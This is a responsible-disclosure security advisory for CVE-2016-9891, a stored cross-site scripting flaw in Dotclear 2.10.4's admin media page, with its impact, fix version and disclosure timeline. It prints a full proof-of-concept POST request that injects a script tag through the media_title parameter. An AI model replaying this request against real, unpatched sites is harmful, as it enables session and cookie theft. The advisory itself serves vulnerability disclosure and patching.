[CVE-2016-9891] Dotclear – XSS Vulnerability in Version 2.10.4
Product Information:
Software: Dotclear
Tested Version: 2.10.4, released 02.11.2016
Vulnerability Type: Cross-Site Scripting (CWE-79)
Description: The project’s purpose is to provide a user-friendly tool allowing anyone to publish on the web, regardless of their technical skills. (copied from https://dotclear.org/about#undefined)
Vulnerability description:
There is a XSS vulnerability in the /dotcl/admin/media_item.php page.
When an authenticated user of Dotclear renames the file title, the following POST request is sent to the server:
POST /dotcl/admin/media_item.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/dotcl/admin/media_item.php?id=4&plugin_id=&popup=0&select=0
Cookie: sidebar-pref=null; dcxd=0408528968495153b0822146207aaaa66d0118f0; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
media_file=testimage.png&media_title=<script>alert(0)</script>.png&media_dt=2016-11-25 19:12&popup=0&select=0&post_id=&id=4&xd_check=8850df45055dfadff791dfbbbd25ed16a16aa3ae
The parameter media_title is vulnerable to XSS.
The payload is executed when an authenticated user navigates to the /dotcl/admin/media.php page.
When embedding an image or adding an attachment under Entries, the media.php page will be called and the payload will trigger as well.
Impact:
An attacker is able to inject malicious scripts into otherwise benign and trusted websites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of an HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).
Solution:
Update to the latest version, which is 2.11.1 (fixed since 2.11), see https://dotclear.org/blog/post/2016/12/28/Dotclear-2.11
Timeline:
Vulnerability found: 26.11.2016
The vendor informed: 05.12.2016
Response by vendor: 05.12.2016
Fix by vendor: 05.12.2016
The patched version released: 28.12.2016
Public Advisory: 29.12.2016
References: